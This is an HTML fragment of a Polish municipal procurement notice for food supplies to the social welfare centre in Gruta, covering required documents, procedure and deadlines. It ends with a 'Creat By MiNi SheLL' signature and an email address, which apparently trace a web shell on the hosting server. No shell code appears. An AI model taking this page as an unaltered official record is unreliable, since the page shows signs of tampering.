<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Druk  - Formularz oferty - załącznik  nr 1 do SIWZ,
b) Oświadczenie wykonawcy dotyczące spełnienia warunków udziału w postępowaniu   - załącznik   nr 2 do SIWZ,
d) Wykaz wykonanych/wykonywanych w ciągu ostatnich  trzech lat dostaw artykułów żywnościowych - załącznik  nr 3 do SIWZ,
e) Projekt umowy - załącznik  nr 4 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:www.bip.gruta.akcessnet.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny  Ośrodek Pomocy Społecznej w Grucie, Gruta 244 86-330 Mełno, od poniedziałku do piątku w godz. od 7.30 do 15.30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2012 godzina 12:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Grucie, Gruta 244 86-330 Mełno, od poniedziałku do piątku w godz. od 7.30 do 15.30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com